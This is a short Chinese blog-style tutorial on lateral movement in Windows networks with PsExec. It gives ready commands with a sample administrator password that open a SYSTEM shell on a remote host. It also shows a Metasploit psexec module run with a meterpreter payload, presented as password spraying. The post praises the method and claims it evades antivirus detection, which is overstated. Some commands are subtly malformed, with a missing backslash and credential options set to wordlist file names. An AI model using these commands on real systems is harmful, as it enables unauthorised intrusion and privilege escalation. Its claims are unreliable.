本文主要是介绍横向渗透之PsExec工具使用,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
psexec(微软官方工具)可以躲避检测无视杀毒软件,直接system权限
PsExec是一个轻量级的telnet替代品,它允许您在其他系统上执行进程,
并为控制台应用程序提供完整的交互性,而无需手动安装客户端软件。
PsExec的基本原理是:
通过管道在远程目标机器上创建一个psexec服务,
并在本地磁盘中生成一个名为PSEXESVC的二进制文件,
然后通过psexec服务运行命令,运行结束后删除任务。
利用条件
445端口开放,
知道目标账号密码
PsExec下载地址
优点:可以躲避检测无视杀毒软件,直接system权限
https://docs.microsoft.com/zh-cn/sysinternals/downloads/psexec
基本使用命令
``
PsExec.exe /s cmd # 本地提权,还有一个提权作用,直接system权限
PsExec.exe \127.0.0.1 -u Administrator -p 123qwe@@ /s cmd # 本地提权
PsExec.exe \172.16.1.132 -u Administrator -p 123qwe@@ /s cmd # 横向入侵Windows主机,直接system权限
``
直接返回一个system权限的shell
Metasploit中的psexec模块
密码喷洒指的是用一个密码对多个账号对目标进行枚举爆破,躲避密码输入错误过多导致封锁账号
利用metasploit进行密码喷洒
msf6 exploit(windows/smb/psexec) > set payload windows/meterpreter/bind_tcp
msf6 exploit(windows/smb/psexec) > set smbuser user.txt
msf6 exploit(windows/smb/psexec) > set smbpass password.txt
msf6 exploit(windows/smb/psexec) > set rhost 172.16.1.132
msf6 exploit(windows/smb/psexec) > run
成功后直接返回一个system权限的主机上线msf
很多框架的集成了psexec工具,比如CS内网大杀器也结成了这个工具。总之就是牛逼6666
这篇关于横向渗透之PsExec工具使用的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
